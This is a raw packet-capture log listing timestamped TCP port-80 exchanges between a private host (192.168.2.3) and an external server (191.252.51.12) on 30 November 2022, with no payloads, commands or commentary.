                                                  Nov 30, 2022 00:37:12.118714094 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.118721962 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118741989 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118752003 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.118762016 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118782043 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118794918 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.118801117 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118819952 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118823051 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.118839025 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118858099 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118890047 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118895054 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.118906975 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.118911982 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118931055 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118949890 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118967056 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.118980885 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.118980885 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119003057 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119005919 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119023085 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119040012 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119041920 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119064093 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119080067 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119082928 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119102955 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119108915 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119122982 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119143963 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119146109 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119163990 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119168043 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119184017 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119204044 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119204044 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119224072 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119242907 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119256020 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119261980 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119283915 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119294882 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119302988 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119323015 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119330883 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119343042 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119362116 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119365931 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119380951 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119400024 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119419098 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119436979 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119445086 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119458914 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119478941 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119487047 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119498968 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119518995 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119530916 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119539976 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119559050 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119569063 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119577885 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119596958 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119611025 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.119616985 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.119641066 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.168842077 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.227576017 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227611065 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227631092 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227649927 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227670908 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227689028 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227708101 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227724075 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.227729082 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227766037 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227778912 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.227785110 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227798939 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.227807045 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227826118 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227844954 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.227844954 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227864981 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227874994 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.227885008 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227905989 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227924109 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.227926970 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227946043 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227951050 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.227965117 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.227983952 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228001118 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228003979 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228024006 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228039026 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228043079 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228068113 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228085041 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228090048 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228110075 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228116989 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228130102 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228149891 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228159904 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228169918 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228189945 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228207111 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228212118 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228231907 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228247881 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228251934 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228272915 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228276968 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228291988 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228311062 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228321075 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228329897 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228348970 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228362083 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228368044 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228388071 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228399038 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228406906 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228425980 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228432894 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228446007 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228466988 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228482008 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228485107 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228504896 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228511095 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228530884 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228549957 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228564978 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228568077 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228589058 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.228600025 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.228641033 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.258711100 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258749008 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258769035 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258784056 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258804083 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258824110 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258843899 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258862972 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258893967 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258915901 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258924961 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.258934021 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258955002 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258969069 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.258987904 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259008884 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259023905 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259023905 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259027004 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259047985 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259049892 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259069920 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259087086 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259143114 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259150982 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259165049 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259185076 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259205103 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259218931 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259219885 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259241104 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259251118 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259259939 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259279966 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259299040 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259310961 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259319067 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259339094 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259339094 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259354115 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259367943 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259387970 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259407997 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259417057 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259428978 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259449959 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259464025 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259470940 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259491920 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259491920 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259510040 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259526968 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259530067 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259550095 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259563923 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259567976 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259588003 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259589911 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259608030 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259625912 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259640932 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259646893 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259675026 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259680033 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259701014 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259720087 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259736061 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259737968 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259758949 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259769917 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259778976 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259799004 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259814024 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259839058 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259859085 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259865999 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259877920 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259897947 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259902000 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259917021 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259934902 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259949923 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259955883 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259975910 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.259980917 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.259995937 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260014057 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260023117 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260032892 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260051966 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260057926 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260071993 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260091066 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260098934 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260109901 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260128975 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260134935 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260149002 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260168076 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260174990 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260186911 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260211945 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260221004 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260231972 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260251999 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260260105 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260271072 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260289907 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260299921 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260309935 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260328054 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260343075 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260346889 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260366917 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260382891 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260385990 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260407925 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260413885 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260427952 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260449886 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260468960 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260478973 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260488987 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260509014 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260520935 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260528088 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260545015 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260550022 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260570049 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260584116 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260590076 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260617971 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260627985 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260638952 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260660887 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260674953 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260679007 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260700941 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260711908 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260720015 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260740042 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260751963 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260760069 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260778904 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260791063 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260798931 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260818958 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260826111 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260838985 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260859013 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260867119 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260879040 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260899067 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260905981 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260919094 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260938883 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260951996 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260957956 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260978937 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.260988951 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.260999918 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261019945 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261025906 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.261040926 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261059999 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261068106 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.261080027 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261099100 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261104107 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.261120081 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261137962 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261146069 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.261158943 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261178970 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261183977 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.261198997 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261218071 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261223078 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.261240005 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261259079 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261265039 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.261280060 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261300087 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261303902 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.261320114 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261339903 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261346102 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.261358976 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261379004 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261383057 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.261398077 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261418104 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261424065 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.261437893 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.261457920 CET8049698191.252.51.12192.168.2.3
